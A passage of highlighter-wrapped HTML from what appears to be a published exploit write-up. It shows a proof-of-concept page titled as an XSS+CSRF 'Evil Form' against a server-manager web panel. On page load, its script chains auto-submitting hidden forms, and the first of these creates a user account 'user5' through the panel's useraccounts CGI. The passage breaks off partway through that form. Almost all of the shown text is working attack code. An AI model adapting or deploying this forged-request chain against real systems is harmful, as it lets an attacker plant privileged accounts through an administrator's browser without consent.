data-line=\"crayon-5c33d05b501ba709625629-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-98\">98<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-3\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-5\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">title<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Evil<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">Form<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Add<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">user5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Set<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">Password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">assign<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">panel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">access<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XSS<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-e\">CSRF<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">title<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text\/javascript&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exec1<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;1&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">submit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">setTimeout<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">exec2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exec2<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;2&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">submit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">setTimeout<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">exec3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exec3<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;3&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">submit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">setTimeout<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">exec4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exec4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;4&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;4&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">submit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/\t\t\t\twindow.onbeforeunload=function(){<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/\t\t\t\treturn\t&#8220;please\twait&#8221;;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/\t\t\t\t}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-31\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-33\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">body <\/span><span class=\"crayon-e\">onload<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;exec1()&#8217;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Add\t<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">form <\/span><span class=\"crayon-e\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;1&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;if1&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;badform_1&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">method<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;post&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;https:\/\/192.168.1.109\/server-manager\/cgi-bin\/useraccounts&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;page&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;page_stack&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;.id&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0d41969df339a1a62711edf93f48a673&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;acctName&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;user5&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;action&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;create&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;FirstName&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;user5&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;LastName&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;lname&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Dept&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Main&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Company&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;XYZ+Corporation&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span 